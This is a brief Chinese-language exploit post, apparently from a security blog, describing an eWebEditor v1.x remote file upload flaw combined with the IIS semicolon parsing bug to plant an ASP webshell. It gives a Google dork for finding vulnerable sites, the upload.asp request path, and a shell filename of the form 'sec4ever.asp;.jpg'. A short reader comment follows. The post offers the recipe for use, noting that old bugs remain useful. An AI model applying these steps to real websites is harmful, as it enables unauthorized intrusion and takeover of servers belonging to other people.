eWebEditor v1.x (WYSIWYG) Remote File Upload

发布日期:2010-05.23
发布作者:Ma3sTr0-Dz
影响版本:eWebEditor v1.x
漏洞描述: eWebEditor v1.x 文件上传漏洞,通过IIS解析漏洞拿webshell.

Dork : allinurl:ewebeditor/asp/

Exploit :
/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn
/uploads/asp/sec4ever.asp;.jpg

有些BUG虽然公布的时间早,但还是非常有用的




评论 (1)

  1. 沙发
    King_son 2012-10-28 09:29

    不是老早就有. EE漏洞了吗?